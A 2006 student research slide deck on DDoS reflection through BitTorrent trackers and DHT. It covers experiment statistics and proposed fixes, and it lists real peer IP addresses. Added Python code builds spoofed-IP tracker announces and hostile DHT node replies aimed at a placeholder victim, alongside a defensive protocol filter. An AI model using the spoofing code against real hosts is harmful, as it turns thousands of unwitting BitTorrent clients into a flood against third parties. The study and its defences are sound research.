DDoS Vulnerability Analysis of BitTorrent Protocol


CS239 project, Spring 2006
Background

BitTorrent (BT)
* P2P file sharing protocol
* 30% of Internet traffic
* Port 6881 is among the top 10 scanned ports on the Internet

DDoS
* Distributed: hard to guard against by simply filtering at upstream routers
* Application level (exhausts the victim's resources)
* Network level (exhausts the victim's bandwidth)
How BT works

* .torrent file (meta-data)
  - Information about the files being shared
  - Hashes of the pieces of the files
* Trackers (coordinators)
  - HTTP and UDP trackers
  - Trackerless (DHT)
* BT clients (participants)
  - Azureus, BitComet, uTorrent, etc.
* Online forum (exchange medium)
  - Where users announce and search for .torrent files
Communication with trackers (diagram)
The seeder posts the .torrent on the discussion forum and tells the tracker "I have the file!". A client fetches the .torrent from the forum and asks the tracker "Who has the file?"; the tracker answers with the list of clients that announced it.
Message exchange

HTTP/UDP tracker
* Announce: "get peers" and "I am sharing" combined; the client registers itself and receives the list of peers sharing the file
* Scrape: information lookup (seeder/leecher counts) without joining the swarm

DHT (trackerless)
* ping / response: announce participation in the DHT network
* find_node: locate nodes in the DHT network
* get_peers: locate who is sharing a file
* announce_peer: announce that this client is sharing a file
Vulnerabilities

Spoofed information
* Both HTTP and UDP trackers let the client specify its own IP in the announce, so an attacker can register a victim's address as a peer for any torrent
* DHT does not allow a client-specified IP in announce_peer (the source address of the announcing node is used)
  - But it does allow spoofed information about who is participating in the DHT network: the node lists returned to find_node/get_peers queries can name any address
  - Possible to redirect a lot of DHT queries to a victim
Compromised tracker
* A tracker under the attacker's control can simply hand out the victim's address to every client that asks
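The DHT redirection described above, as an added example that is not code from the project: a hostile node answers a find_node query with a KRPC reply whose "nodes" value (BEP 5 compact node info, 26 bytes per entry) points every entry at the victim, and a querying client applies the sanity check a defensive implementation would want. Node ids, the transaction id and the address 192.0.2.10 are constructed for the example.

```python
import socket
import struct
from collections import Counter

NODE_LEN = 26   # 20-byte node id + 4-byte IPv4 + 2-byte port (BEP 5 compact node info)


def compact_node(node_id, ip, port):
    """Encode one entry of a DHT "nodes" value."""
    return node_id + socket.inet_aton(ip) + struct.pack('>H', port)


def parse_compact_nodes(blob):
    """Decode a "nodes" value into (node_id, ip, port) tuples."""
    if len(blob) % NODE_LEN:
        raise ValueError('nodes value is not a multiple of 26 bytes')
    out = []
    for off in range(0, len(blob), NODE_LEN):
        entry = blob[off:off + NODE_LEN]
        out.append((entry[:20],
                    socket.inet_ntoa(entry[20:24]),
                    struct.unpack('>H', entry[24:26])[0]))
    return out


def find_node_response(transaction_id, own_id, nodes):
    """KRPC reply {"t": tid, "y": "r", "r": {"id": own_id, "nodes": ...}}, hand-bencoded
    with dict keys in sorted order (r, t, y and id, nodes) as bencode requires."""
    blob = b''.join(nodes)
    return (b'd1:rd2:id20:' + own_id
            + b'5:nodes' + str(len(blob)).encode() + b':' + blob + b'e'
            + b'1:t' + str(len(transaction_id)).encode() + b':' + transaction_id
            + b'1:y1:re')


def malicious_nodes(victim_ip, victim_port, count=8):
    """What a hostile DHT node returns: every "closest node" is the victim.
    Node ids are constructed here; an attacker would pick ids close to the queried target."""
    return [compact_node(bytes([i]) * 20, victim_ip, victim_port) for i in range(count)]


def suspicious_nodes(nodes, max_per_ip=1):
    """Client-side sanity check: several entries sharing one IP in a nodes list is a
    reflection attempt (or a misconfiguration). Returns the offending addresses."""
    counts = Counter(ip for _, ip, _ in nodes)
    return sorted(ip for ip, n in counts.items() if n > max_per_ip)


if __name__ == '__main__':
    victim = '192.0.2.10'                      # placeholder (RFC 5737 range)
    reply = find_node_response(b'aa', b'\x01' * 20, malicious_nodes(victim, 80))
    print(len(reply), 'byte reply')
    parsed = parse_compact_nodes(reply[reply.index(b'5:nodes208:') + 11:][:8 * NODE_LEN])
    print('addresses repeated in nodes list:', suspicious_nodes(parsed))
```

Honest responders return distinct addresses for the closest nodes, so a client that refuses lists where one IP appears more than once (and that never contacts a returned node on a port such as 80 that a DHT node has no business listening on) removes most of this amplification.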
Attack illustration (diagram)
The attacker collects many .torrent files from the discussion forum and, for each one, announces to its tracker "Victim has the files!" with the victim's IP. Clients that later ask the tracker "Who has the files?" are given the victim's address and connect to it.
Experiments

* Discussion forum (http://www.mininova.org)
  - 1191 newly uploaded .torrent files collected in 2 days
* Victim (131.179.187.205)
  - Apache web server (configured to serve 400 clients)
  - Monitored with tcpdump and netstat
* Attacker
  - Python script to process the .torrent files and contact their trackers
* Zombies
  - Computers around the Internet running BitTorrent clients
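The spoofed-IP announce from the Vulnerabilities slide, and the kind of processing the attacker script above had to do, as an added example that is not the project's script: decode a .torrent, derive the info_hash and the tracker list, and build the HTTP announce URL and the 98-byte UDP announce request (UDP tracker protocol) with the client-supplied IP field set. The sample .torrent, the tracker host names, the peer id and the victim address 192.0.2.10 are constructed for the example; nothing is sent.

```python
import hashlib
import socket
import struct
from urllib.parse import urlencode

# Constructed sample .torrent (bencoded dict with "announce", "announce-list"
# and "info"); the tracker host names are placeholders.
SAMPLE_TORRENT = (
    b'd'
    b'8:announce35:http://tracker.example.org/announce'
    b'13:announce-list'
    b'll35:http://tracker.example.org/announceel30:udp://tracker.example.net:6969ee'
    b'4:infod6:lengthi1024e4:name8:file.bin12:piece lengthi512e6:pieces40:'
    + bytes(range(40))          # two fake 20-byte SHA-1 piece hashes
    + b'ee'
)


def bdecode(data):
    """Decode a bencoded byte string (ints, byte strings, lists, dicts)."""
    def parse(i):
        c = data[i:i + 1]
        if c == b'i':
            end = data.index(b'e', i)
            return int(data[i + 1:end]), end + 1
        if c == b'l':
            items, i = [], i + 1
            while data[i:i + 1] != b'e':
                item, i = parse(i)
                items.append(item)
            return items, i + 1
        if c == b'd':
            d, i = {}, i + 1
            while data[i:i + 1] != b'e':
                key, i = parse(i)
                val, i = parse(i)
                d[key] = val
            return d, i + 1
        if c.isdigit():
            colon = data.index(b':', i)
            start = colon + 1
            end = start + int(data[i:colon])
            return data[start:end], end
        raise ValueError('bad bencode at offset %d' % i)
    value, consumed = parse(0)
    if consumed != len(data):
        raise ValueError('trailing data after bencoded value')
    return value


def bencode(value):
    """Encode back to bencode; dict keys are emitted in sorted order, as the format requires."""
    if isinstance(value, int):
        return b'i%de' % value
    if isinstance(value, bytes):
        return b'%d:%s' % (len(value), value)
    if isinstance(value, list):
        return b'l' + b''.join(bencode(v) for v in value) + b'e'
    if isinstance(value, dict):
        return b'd' + b''.join(bencode(k) + bencode(value[k]) for k in sorted(value)) + b'e'
    raise TypeError('cannot bencode %r' % type(value))


def info_hash(torrent):
    """SHA-1 of the bencoded "info" dict: the key under which trackers index peers."""
    return hashlib.sha1(bencode(torrent[b'info'])).digest()


def tracker_urls(torrent):
    """All trackers named by the torrent ("announce" plus every "announce-list" tier), deduplicated."""
    urls = [torrent[b'announce']]
    for tier in torrent.get(b'announce-list', []):
        urls.extend(tier)
    return list(dict.fromkeys(u.decode() for u in urls))


def http_announce_url(tracker, ih, peer_id, ip, port=80):
    """HTTP tracker announce. The optional "ip" parameter is the spoofable field: a tracker
    that honours it registers ip:port, not the sender's address, as a peer for this torrent."""
    params = [('info_hash', ih), ('peer_id', peer_id), ('port', port),
              ('uploaded', 0), ('downloaded', 0), ('left', 1024),
              ('event', 'started'), ('ip', ip)]
    return tracker + '?' + urlencode(params)


UDP_PROTOCOL_ID = 0x41727101980    # magic constant of the UDP tracker protocol
ACTION_CONNECT, ACTION_ANNOUNCE = 0, 1
EVENT_STARTED = 2


def udp_connect_request(transaction_id):
    """First UDP tracker message (16 bytes); the reply carries the connection_id used below."""
    return struct.pack('>QII', UDP_PROTOCOL_ID, ACTION_CONNECT, transaction_id)


def udp_announce_request(connection_id, transaction_id, ih, peer_id, ip, port=80):
    """98-byte UDP announce. The 4-byte "IP address" field at offset 84 is the spoofable one:
    0 means "use the sender's address"; any other value is taken as given."""
    ip_num = struct.unpack('>I', socket.inet_aton(ip))[0]
    return struct.pack('>QII20s20sQQQIIIiH',
                       connection_id, ACTION_ANNOUNCE, transaction_id,
                       ih, peer_id,
                       0, 1024, 0,            # downloaded, left, uploaded
                       EVENT_STARTED, ip_num,
                       0, -1,                 # key, num_want (-1 = tracker default)
                       port)


if __name__ == '__main__':
    torrent = bdecode(SAMPLE_TORRENT)
    ih = info_hash(torrent)
    peer_id = b'-XX0001-' + b'0' * 12         # constructed, not a real client's id
    victim = '192.0.2.10'                     # placeholder (RFC 5737 range)
    for url in tracker_urls(torrent):
        if url.startswith('http'):
            print(http_announce_url(url, ih, peer_id, victim))
        else:
            pkt = udp_announce_request(0x1234, 0x42, ih, peer_id, victim)
            print(url, len(pkt), 'bytes, ip field =', pkt[84:88].hex())
```

The attacker never needs a working BitTorrent client: one announce per tracker is enough to have the tracker return victim:80 to every client that asks for that torrent, and the "left" value keeps the victim listed as a leecher so that seeders are also told about it.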
Statistics

Torrents               Count
Total                   1191
Corrupted                  6
Single tracker           999
Multiple trackers        186
Support DHT              121

Trackers               Count
HTTP trackers           1963
UDP trackers              85
Unique HTTP trackers     311
Unique UDP trackers       21
Measurements (1)
Attacker: 1191 torrent files used; 30 concurrent threads; each tracker contacted once

Measurements (2)
Attacker: 1191 torrent files used; 40 concurrent threads; each tracker contacted 10 times; attack ends after 8 hours

Measurements (3)
* 30513 distinct IPs recorded at the victim
* Plot: number of connection attempts per host
* Retrying at 3, 6, 9, ... attempts appears to be a common client implementation
Measurement (abnormal behavior)

Top 15 hosts with the highest number of connection attempts

Attempts  Host             Country
8995      202.156.6.67     Singapore (SG)
8762      24.22.183.141    United States (US)
1953      71.83.213.106    Unknown (XX)
1841      24.5.44.13       United States (US)
1273      147.197.200.44   United Kingdom (UK)
1233      82.40.167.116    United Kingdom (UK)
1183      194.144.130.220  Iceland (IS)
1171      82.33.194.6      United Kingdom (UK)
1167      219.78.137.197   Hong Kong (HK)
1053      83.146.39.94     United Kingdom (UK)
1042      82.10.187.190    United Kingdom (UK)
896       65.93.12.152     Canada (CA)
861       84.231.86.223    Finland (FI)
855       24.199.85.75     United States (US)
753       207.210.96.205   Canada (CA)

Content pollution agents? Other researchers?
Top 15 countries (plot; in rank order)
United States, Canada, United Kingdom, Germany, France, Spain, Australia, Sweden, Netherlands, Malaysia, Norway, Poland, Japan, Brazil, China
Countries with fewer BT clients running (plot)
Albania, Bermuda, Bolivia, Georgia, Ghana, Kenya, Lao, Lebanon, Monaco, Mongolia, Nicaragua, Nigeria, Qatar, Tanzania, Uganda, Zimbabwe
Solution

* Better tracker implementation (ignore the client-supplied IP and record the source address of the announce)
* Authentication with trackers
  - Similar to the one used in DHT, where announce_peer must present a token previously issued to the announcing node's address
* Filtering packets by analyzing the protocol
  - e.g. for incoming connections to port 80 (after the SYN/ACK handshake), check that the first data packet carries a legitimate HTTP request header; a misdirected BitTorrent client sends a BitTorrent handshake instead
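The protocol-analysis filter suggested above, as an added example rather than code from the project: classify the first data segment of each connection to the web port as HTTP, BitTorrent handshake (pstrlen 0x13 followed by "BitTorrent protocol"), empty or unknown, drop everything but HTTP, and block a source after repeated drops, since the measurements showed clients retrying a failed peer several times. The sample connections and their addresses (RFC 5737 ranges) are constructed; a real deployment would feed the filter from the packet capture or an application-layer proxy.

```python
import re
from collections import Counter

# First bytes a BitTorrent peer sends once TCP is up: pstrlen (0x13) + "BitTorrent protocol".
BT_HANDSHAKE = b'\x13BitTorrent protocol'
# Request line of a plausible HTTP request: method, target, version, CRLF.
HTTP_REQUEST_LINE = re.compile(rb'^(?:GET|HEAD|POST|PUT|DELETE|OPTIONS) [^ \r\n]+ HTTP/1\.[01]\r\n')


def classify_first_payload(payload):
    """Label the first data segment of a connection to the web port."""
    if payload.startswith(BT_HANDSHAKE):
        return 'bittorrent'
    if HTTP_REQUEST_LINE.match(payload):
        return 'http'
    if not payload:
        return 'empty'          # handshake completed but no request was sent
    return 'unknown'


class ProtocolFilter:
    """Accept HTTP, drop anything else, and block a source outright once it has been
    dropped `block_after` times (BitTorrent clients retry a peer that fails)."""

    def __init__(self, block_after=3):
        self.block_after = block_after
        self.drops = Counter()
        self.blocked = set()

    def decide(self, src_ip, payload):
        if src_ip in self.blocked:
            return 'blocked'
        kind = classify_first_payload(payload)
        if kind == 'http':
            return 'accept'
        self.drops[src_ip] += 1
        if self.drops[src_ip] >= self.block_after:
            self.blocked.add(src_ip)
        return 'drop:' + kind


def run_filter(connections, block_after=3):
    """connections: (src_ip, first_payload) pairs in arrival order; returns (src_ip, verdict) pairs."""
    f = ProtocolFilter(block_after)
    return [(ip, f.decide(ip, payload)) for ip, payload in connections]


# Constructed sample: one real browser, two misdirected BitTorrent clients (the second
# one retries, as seen in the measurements), and one connection that sends nothing.
BT_PEER_A = BT_HANDSHAKE + b'\x00' * 8 + b'\x11' * 20 + b'-XX0001-000000000000'
BT_PEER_B = BT_HANDSHAKE + b'\x00' * 8 + b'\x11' * 20 + b'-XX0001-000000000001'
SAMPLE_CONNECTIONS = [
    ('198.51.100.7', b'GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n\r\n'),
    ('203.0.113.5', BT_PEER_A),
    ('203.0.113.9', BT_PEER_B),
    ('203.0.113.9', BT_PEER_B),
    ('203.0.113.9', BT_PEER_B),
    ('203.0.113.9', b''),
    ('198.51.100.7', b'POST /login HTTP/1.0\r\n\r\n'),
]

if __name__ == '__main__':
    for ip, verdict in run_filter(SAMPLE_CONNECTIONS):
        print(ip, verdict)
```

The check can only run once the TCP handshake has completed and the first data segment has arrived, so it protects the application (Apache's 400 client slots are freed quickly instead of being held by peers waiting for a BitTorrent handshake reply) but does nothing against the network-level variant where the bandwidth of the SYNs themselves is the problem; for that the per-source block list has to be pushed down to a packet filter or upstream.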
End
Q and A